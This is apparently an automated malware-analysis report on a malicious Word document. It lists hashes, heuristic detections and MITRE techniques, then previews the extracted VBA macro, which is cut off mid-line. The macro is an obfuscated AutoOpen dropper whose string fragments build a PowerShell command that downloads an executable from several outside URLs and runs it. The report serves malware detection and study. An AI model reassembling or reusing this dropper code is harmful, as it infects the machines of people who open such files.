Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6e2460dab20fcca2…

MALICIOUS

Office (OLE)

134.5 KB Created: 2018-01-07 12:53:00 Authoring application: Microsoft Office Word First seen: 2018-01-23
MD5: 7bdea527c2e5775e52feb8c52c40d7f2 SHA-1: 3507d756273c876c8376c49ab3d977ddf8ac9e81 SHA-256: 6e2460dab20fcca216798641dfa821e73b5bccf510df487839f542a198740778
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() function to execute a command. This command appears to be designed to download and display a phishing lure, as indicated by the ClamAV detection name 'Img.Dropper.PhishingLure'. The obfuscated script attempts to construct a URL for this purpose.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://oi1+oi1wwophr+phri1+oi1woi1+oi1 In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 40312 bytes
SHA-256: 306f7146b3cc309721edda6a16916d8cf3f8c966ee2dbe7c466dcff32b9cd6bc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BrQEfdbVTcBNAa"
Sub AutoOpen()
On Error Resume Next
NoSzrulod = 8 + CDbl(JihpRHYB) / (YoPEMPKLLN + ChrB(YwwBfmqCChDH / ChrW(847) * WEsjONbmwoEz - Sgn(342)))
zjFihjZar = 8 + CDbl(NmfJiQWznUjf) / (IXbwzlzaHrEi + ChrB(kUUwiht / ChrW(847) * rFDEjLQwAkQSA - Sgn(342)))
wKGncorHF = 8 + CDbl(bbajCipqzltRRX) / (OajbGGnPCoJOL + ChrB(sChlKcc / ChrW(847) * fNULuRjH - Sgn(342)))
ftivONHfw = 8 + CDbl(nMYrtQioGjMfH) / (OFvWHvMVivIPfQ + ChrB(iuCnWoQknTEhF / ChrW(847) * zuzmnjIR - Sgn(342)))
Application.Run "OXDTXiwCQBa", HCbowIECu
kXCbRicji = 8 + CDbl(OAbpKskGwVIC) / (OHKlAJc + ChrB(jfNJikuWmHDpT / ChrW(847) * FjIkHBjhn - Sgn(342)))
JiUoTGsca = 8 + CDbl(siVOffI) / (jLNENkvCbdQBb + ChrB(CrEbKvaQ / ChrW(847) * fdnaojUcFwLzVZ - Sgn(342)))
EUktRfPMY = 8 + CDbl(hbdKDVMPTSi) / (aJGSGAKCPNj + ChrB(zHaCJkdTF / ChrW(847) * sMGKYkmwd - Sgn(342)))
DqcuamzYP = 8 + CDbl(VKTvLKw) / (JFjoPWMRtLwbaQ + ChrB(kcbXNzPKL / ChrW(847) * RjCYRvzcp - Sgn(342)))
End Sub
Function HCbowIECu()
On Error Resume Next
zBjzHa = ("zsl8QqnBvaYrphr+phr+oi1t xoi1+oi170_.Eoi1+oi1xoi1+oi1ceptphr+phrioi1+oi'+'1on.Moi1+oi1essa'+'ge;oi1+oi1}}oiphr+XpJztajSjOVI")
jUpuKP = 8 + CDbl(YBGNkJXCjKoAP) / (AYiTjEadPNbz + ChrB(YQsQzZsXNvOR / ChrW(847) * jkjLuPmvwwutwq - Sgn(342)))
wAUzUw = Mid(zBjzHa, 13, 99)
WiBPfhjiu = 8 + CDbl(vltmkazmn) / (qaWMmcTBmYqzET + ChrB(NmcTwXzj / ChrW(847) * bbCcjWhwsRD - Sgn(342)))
OmBPiQPL = ("BN0Kdn1+oi1+oi1 oi1+oi1Yophr+phri1+oi1xoi1+oi1N3bPYxophr+phri1+oi1Nphr+phr + oi1+oi1xoi1+oi1phr+phr70karapoi1+oi1aphr+phrs + YxN.exeYoi1+o1UjE")
RjmsnmSAIAz = 8 + CDbl(JiJfCuM) / (TzztkXvbituLCZ + ChrB(FSSsDavHQzoL / ChrW(847) * hMCsDbiDSHnI - Sgn(342)))
BboiSHY = Mid(OmBPiQPL, 8, 131)
PWJQhsXV = 8 + CDbl(pRkzPAjzDNkCJ) / (YritwLNtVq + ChrB(HavhmLf / ChrW(847) * KkdXRjncldwS - Sgn(342)))
AaSHzrT = ("9n5ph'+'r1).ReplAC'+'e(oi1YxNoi1,[StrINg][CHaR]39).Replphr+phrACe((['+'CHaR]51+[CHaphr+phrR]98phsOP0pOalNb7s")
hIBZLhiHjFB = 8 + CDbl(bNoVMwNYvT) / (rSDiNDjY + ChrB(luEwtOERiU / ChrW(847) * MqziuuGDaKmSCd - Sgn(342)))
JFobAA = Mid(AaSHzrT, 4, 93)
FfSNSp = 8 + CDbl(kuFZaHIIihJ) / (bzrvtbWwAUUnT + ChrB(dwKwbCVOiKMFtp / ChrW(847) * iPBlFiF - Sgn(342)))
SiUzCEdrOtR = ("P2tiqAkFwtrYcRZ61kozio'+'lku.pl'+'/omgr/,hoi1+oi1t'+'tpoi1+oi1'+'://oi1+oi1www.sca4ch'+'rist.org/ZLkpa/,httoi'+'1+oi1poi1+oi1:'+'phr+phroi'+'1+oi1//woi1+ophr+phri1ww.thoi1+oi1foi1+oi1poi1+ocE")
VJsDTsnksmV = 8 + CDbl(dkRmCfFJwkMKIO) / (LFvCiVldcEzpo + ChrB(UAhZVYdBl / ChrW(847) * QAaXGXEb - Sgn(342)))
XzhERahfjH = Mid(SiUzCEdrOtR, 17, 173)
fLNbmo = 8 + CDbl(HEGwhBasHoi) / (qQrijik + ChrB(pOJTimduNXEz / ChrW(847) * JjNOCAXujW - Sgn(342)))
BnadE = ("lCTihSzcX43245);x7oi1+oi10hoi1+oi1uoi1+oi1aoi1+oi1s =oi1+oi1 x70oi1+oi1env:publico'+'phr+phriphr+phr1+'+'oi1 PcJtOwSAFKdBETfOs")
GlMLmRiNW = 8 + CDbl(bmEAOBmcV) / (szFdoPGzjBw + ChrB(pidULiYDzO / ChrW(847) * LovZMcIFVuzTvG - Sgn(342)))
Zqkpdz = Mid(BnadE, 10, 100)
QbrYknJo = 8 + CDbl(MwYkmmWEzWXup) / (DSaiCtp + ChrB(puUYvbcpPhNVWc / ChrW(847) * PbKokwDpiSB - Sgn(342)))
NXbdfmo = ("KJ43kdBr+phr+[CHaR]80),[StrINg][CHaR]92).ReplACe(('+'[CHaR]1phr+phr20+[CHaR]55+[CHaR]48),oi1gWGo'+'i1) ) phr)-creplace  phroi1phr,[chAr]39-Replacephrln5BkOz7")
diYsVYj = 8 + CDbl(qwABwUro) / (mBHuWUZd + ChrB(wmbpjBjz / ChrW(847) * FnMpYLwEpEl - Sgn(342)))
XHsGwJIJH = Mid(NXbdfmo, 8, 142)
lapjBf = 8 + CDbl(ZRLEnnsb) / (BaVFXHhAPzVB + ChrB(lBAwdwzSiVsBW / ChrW(847) * PlsOnWuENq - Sgn(342)))
WTbHbOk = ("1aPzq7jC4as);Ioi1+oiphr+phr1nvoke-Item(oi1+oi1x70hoi1+oi1uas);breakoi1+'+'oi1;oi1+oi1}catchoi1phr+phr+oi1{write-hosoi1ds4BtL")
sjuHhYcTw = 8 + CDbl(fjINjzQwoDUhb) / (wWtihDuBTpAH + ChrB(wNiVjrlR / ChrW(847) * fzjcbma - Sgn(342)))
UrjkpcTi = Mid(WTbHbOk, 10, 109)
jmiBHam = 8 + CDbl(vvUFpin) / (WnwiNTMZoS + ChrB(GinppSwqwwEb / ChrW(847) * bStFmGJi - Sgn(34
... (truncated)